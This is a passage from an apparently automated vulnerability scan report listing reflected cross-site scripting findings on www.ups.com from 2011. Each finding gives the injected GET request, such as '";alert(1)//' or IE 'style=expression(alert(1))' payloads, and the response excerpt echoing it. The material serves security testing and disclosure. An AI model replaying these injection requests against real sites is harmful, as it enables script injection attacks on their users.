Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18070

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&viewID=browseView&WT.svl=PriNav&loc=en_USe2cb0"style="x:expression(alert(1))"1a12ccdf313" />
...[SNIP]...

1.299. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 582f9"%3balert(1)//3f6cf9199d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 582f9";alert(1)//3f6cf9199d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?582f9"%3balert(1)//3f6cf9199d5=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=Z2rlNYGQLcQDlzCSYkFCcdRy0gzf5r1LDs5gDDnbhBQvdfjtc5ln!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lor", "#869ca7",
           "name", "bussol",
           "allowScriptAccess","sameDomain",
           "type", "application/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "582f9";alert(1)//3f6cf9199d5=1&bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646736688&loc=en_US&v=2.0.4"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display =
...[SNIP]...

1.300. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f277"><script>alert(1)</script>5f1197d854b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?7f277"><script>alert(1)</script>5f1197d854b=1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=LnCdNYGQnMQlkndzq12lTrZf1YJXy8q8Q4zYPKzFPPYvjywjk1vm!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17904

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="unKnown"
value="&7f277"><script>alert(1)</script>5f1197d854b=1" />
...[SNIP]...

1.301. http://www.ups.com/bussol/ [viewID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The value of the viewID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47fa2"%3balert(1)//ebe16f7eeec was submitted in the viewID parameter. This input was echoed as 47fa2";alert(1)//ebe16f7eeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bussol/?loc=en_US&viewID=browseView47fa2"%3balert(1)//ebe16f7eeec&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=1skDNYGJnpQbW35Gyd5CQzr6JgDLTXLRbrDhGxGFhfhp4Y6QTVbS!-874049020!-1727860139!15202!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17966

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
lication/x-shockwave-flash",
           "pluginspage", "http://www.adobe.com/go/getflashplayer",
           "FlashVars", "bspa_xmlRoot=/xml/ria/na/us/en/bussol/&hash=1297646740543&loc=en_US&v=2.0.4&viewID=browseView47fa2";alert(1)//ebe16f7eeec"
   );
} else { // flash is too old or we can't detect the plugin
   document.getElementById("noflashdiv").style.display = "block";
}
</script>
...[SNIP]...

1.302. http://www.ups.com/bussol/ [viewID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/bussol/

Issue detail

The value of the viewID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a was submitted in the viewID parameter. This input was echoed as 948b5"style="x:expression(alert(1))"6ccbe3a297a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bussol/?loc=en_US&viewID=browseView948b5"style%3d"x%3aexpression(alert(1))"6ccbe3a297a&WT.svl=PriNav&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Set-Cookie: com.ups.bussol.data=hWWhNYGTZF7r1mv0H5V2nHjKH8JjGycJTT32p2qb4NFT6r3f5BpS!813271666!-1727860140!15201!-1; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="hidden" id="bspa_viewID"
value="browseView948b5"style="x:expression(alert(1))"6ccbe3a297a" />
...[SNIP]...

1.303. http://www.ups.com/content/global/index.jsx [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/global/index.jsx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1 was submitted in the REST URL parameter 2. This input was echoed as be80f"style="x:expression(alert(1))"dcbd75eabc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/globalbe80f"style%3d"x%3aexpression(alert(1))"dcbd75eabc1/index.jsx HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124321

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/globalbe80f"style="x:expression(alert(1))"dcbd75eabc1/index.jsx">
...[SNIP]...

1.304. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/index.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a487"style%3d"x%3aexpression(alert(1))"0e616329edb was submitted in the REST URL parameter 2. This input was echoed as 3a487"style="x:expression(alert(1))"0e616329edb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us3a487"style%3d"x%3aexpression(alert(1))"0e616329edb/en/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us3a487"style="x:expression(alert(1))"0e616329edb/en/about/index.html">
...[SNIP]...

1.305. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/index.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7 was submitted in the REST URL parameter 3. This input was echoed as 74567"style="x:expression(alert(1))"c1726c9caa7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en74567"style%3d"x%3aexpression(alert(1))"c1726c9caa7/about/index.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:40 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en74567"style="x:expression(alert(1))"c1726c9caa7/about/index.html">
...[SNIP]...

1.306. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f was submitted in the REST URL parameter 2. This input was echoed as 73b92"style="x:expression(alert(1))"42a5a1abd9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us73b92"style%3d"x%3aexpression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us73b92"style="x:expression(alert(1))"42a5a1abd9f/en/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.307. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20091007_batteries.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1 was submitted in the REST URL parameter 3. This input was echoed as 9aa1f"style="x:expression(alert(1))"2fac5398be1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en9aa1f"style%3d"x%3aexpression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39118

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en9aa1f"style="x:expression(alert(1))"2fac5398be1/about/news/service_updates/20091007_batteries.html">
...[SNIP]...

1.308. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1 was submitted in the REST URL parameter 2. This input was echoed as e708d"style="x:expression(alert(1))"1e47b8d55c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/use708d"style%3d"x%3aexpression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:27 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/use708d"style="x:expression(alert(1))"1e47b8d55c1/en/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.309. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20100120_on_call.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55c63"style%3d"x%3aexpression(alert(1))"76498229caa was submitted in the REST URL parameter 3. This input was echoed as 55c63"style="x:expression(alert(1))"76498229caa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en55c63"style%3d"x%3aexpression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:30 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35932

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en55c63"style="x:expression(alert(1))"76498229caa/about/news/service_updates/20100120_on_call.html">
...[SNIP]...

1.310. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aca67"style%3d"x%3aexpression(alert(1))"e8465dd6765 was submitted in the REST URL parameter 2. This input was echoed as aca67"style="x:expression(alert(1))"e8465dd6765 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/usaca67"style%3d"x%3aexpression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/usaca67"style="x:expression(alert(1))"e8465dd6765/en/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.311. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20100624_fraud.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8 was submitted in the REST URL parameter 3. This input was echoed as 1e239"style="x:expression(alert(1))"aa66e09bfd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en1e239"style%3d"x%3aexpression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:35 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en1e239"style="x:expression(alert(1))"aa66e09bfd8/about/news/service_updates/20100624_fraud.html">
...[SNIP]...

1.312. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317 was submitted in the REST URL parameter 2. This input was echoed as 68f09"style="x:expression(alert(1))"4a5c6425317 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us68f09"style%3d"x%3aexpression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:36 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us68f09"style="x:expression(alert(1))"4a5c6425317/en/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.313. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101102_investigation.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96520"style%3d"x%3aexpression(alert(1))"18844fce5ae was submitted in the REST URL parameter 3. This input was echoed as 96520"style="x:expression(alert(1))"18844fce5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us/en96520"style%3d"x%3aexpression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:39 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="http://www.ups.com/content/us/en96520"style="x:expression(alert(1))"18844fce5ae/about/news/service_updates/20101102_investigation.html">
...[SNIP]...

1.314. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ups.com
Path:	/content/us/en/about/news/service_updates/20101102_toner.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4 was submitted in the REST URL parameter 2. This input was echoed as 4eb22"style="x:expression(alert(1))"34b6ca681d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /content/us4eb22"style%3d"x%3aexpression(alert(1))"34b6ca681d4/en/about/news/service_updates/20101102_toner.html HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:25:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34171

